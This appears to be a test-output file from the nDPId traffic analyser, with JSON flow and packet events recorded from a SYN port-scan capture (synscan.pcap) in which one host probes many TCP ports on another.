+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAslLUAACwGh72sEAAIQA2GNIzTrJDdU4MZAAAAAGACBACH+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAs7LUAACsGML2sEAAIQA2GNIzSFF7dUoMYAAAAAGACEAAUMQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVm4AADkGuQSsEAAIQA2GNIzSABHdUoMYAAAAAGACCAAwfgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsYdQAACsGu56sEAAIQA2GNIzSGivdUoMYAAAAAGACEAAOZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GMAADEGIw+sEAAIQA2GNIzSDubdUoMYAAAAAGACCAAhqQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtkAADYG85msEAAIQA2GNIzSX3zdUoMYAAAAAGACDADNEgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAslyIAACUGjFCsEAAIQA2GNIzSABrdUoMYAAAAAGACCAAwdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVt0AADIGv5WsEAAIQA2GNIzSDSndUoMYAAAAAGACDAAfZgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/FUAADMGGR2sEAAIQA2GNIzSCU7dUoMYAAAAAGACEAAfQQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsoxcAACkGfFusEAAIQA2GNIzSAprdUoMYAAAAAGACCAAt9QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtAAADkG0KKsEAAIQA2GNIzSBNzdUoMYAAAAAGACCAArswAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDHcAADUGBvysEAAIQA2GNIzSC+zdUoMYAAAAAGACCAAkowAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTUIAADEGyjCsEAAIQA2GNIzS8n7dUoMYAAAAAGACCAA+EAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsMe8AACwG6oOsEAAIQA2GNIzSD07dUoMYAAAAAGACBAAlQQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPKgAADIG2cqsEAAIQA2GNIzSAyHdUoMYAAAAAGACDAApbgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsmokAADcGdumsEAAIQA2GNIzSSp3dUoMYAAAAAGACEADd8QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAssaoAADMGY8isEAAIQA2GNIzTgA3dU4MZAAAAAGACEACofgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAs+UUAAC8GIC2sEAAIQA2GNIzTFXzdU4MZAAAAAGACEAATEAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1UAADcGRh2sEAAIQA2GNIzTArzdU4MZAAAAAGACEAAl0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAslw0AADIGf2WsEAAIQA2GNIzTC8ndU4MZAAAAAGACDAAgwwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsfFsAADIGmhesEAAIQA2GNIzTJxLdU4MZAAAAAGACDAAFegAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRAAADkGrmKsEAAIQA2GNIzTBGvdU4MZAAAAAGACCAAsIQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAskzsAADEGhDesEAAIQA2GNIzTARjdU4MZAAAAAGACCAAvdAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsr9IAADkGX6CsEAAIQA2GNIzTBzDdU4MZAAAAAGACCAApXAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsuXkAADkGVfmsEAAIQA2GNIzTG1jdU4MZAAAAAGACCAAVNAAAAgQFtA=="} 